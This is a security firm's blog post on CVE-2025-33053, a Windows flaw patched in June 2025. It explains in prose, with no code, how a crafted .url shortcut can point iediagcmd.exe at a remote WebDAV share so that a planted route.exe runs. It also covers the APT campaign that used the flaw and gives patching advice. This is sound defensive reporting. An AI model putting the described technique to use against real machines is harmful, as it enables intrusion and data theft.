Week 24 – Critical vulnerability in Windows is fixed on Patch Tuesday

09 – 15 June 2025

After our last CVE of the Week post exploring a critical vulnerability in the open source landscape, we are back again in the Microsoft ecosystem, as it’s just past Patch Tuesday, which keeps on giving (and more importantly, fixing) weaknesses in Windows.

Probably the most interesting on the long list of fixed security bugs is CVE-2025-33053, an unauthenticated Remote Code Execution, which exploits the fact that Windows does not properly validate the WorkingDirectory variable in Internet Shortcuts, or as most of us know them, .url files.

Unfortunately, the attack has been in the wild for many months now as a zero day, with the first malware sample identified by CheckPoint’s researchers back in March.

Without deep diving into the technical details, the kill chain begins with sending a phishing mail with a maliciously crafted .url file which executes iediagcmd.exe, a legitimate Windows tool that collects diagnostics info for Internet Explorer. This diagnostic tool calls other valid executables like ipconfig.exe, netsh.exe and route.exe. However, there’s a twist: you can set this tool’s working directory in the .url file and it’s even allowed to point to a remote WebDAV share! This means that you can host your own malware on a network share, you just have to name it route.exe and it will be executed once the targeted user clicks on the crafted shortcut.

The threat actors, who are associated with the Stealth Falcon APT group, did not stop at this point. They continued to deliver advanced payloads after the initial access, utilizing defense evasion, anti-debugging and obfuscation techniques. The final result is full control over the victim’s machine, allowing the attackers to exfiltrate data, send commands, inject shellcode into running processes and basically do whatever they want, all happening in the background while the victim is reading a bait PDF document.

For those interested in going down the rabbit hole, we are sharing a link to CheckPoint’s excellent writeup, which is definitely worth a read if you want to learn more about this sophisticated threat. It’s also a useful resource for blue teamers as it shares valuable IoCs to help defend your networks.

Furthermore, the usual security best practices apply as always: patch as soon as possible, investigate past emails with suspicious (especially .url) attachments and educate users to avoid clicking on attachments before verifying that they came from a trusted source.

CheckPoint research: https://research.checkpoint.com/2025/stealth-falcon-zero-day/

Official advisory: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053

CVE details by NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-33053

White Hat IT Security is a Europe-based Managed Security Services Provider (MSSP) and proud Microsoft Solution Partner. Its Microsoft-verified managed security solutions (MXDR) reflect their deep expertise and commitment to excellence in cybersecurity. The company was awarded the Partner of the Year Hungary Award by Microsoft in 2024.

With the largest incident response capacity in the CEE region, they’re trusted by organizations to deliver fast, effective, and proactive protection. Their portfolio includes penetration testing, vulnerability assessments, managed Cyber Threat Intelligence, as well as Governance, Risk and Compliance (GRC) consulting and specialized security training.

They are committed to supporting professional initiatives that aim to raise cybersecurity awareness and maturity—both for individuals and organizations. They regularly contribute to the community through knowledge sharing, education, and outreach, helping to build a safer digital future for all.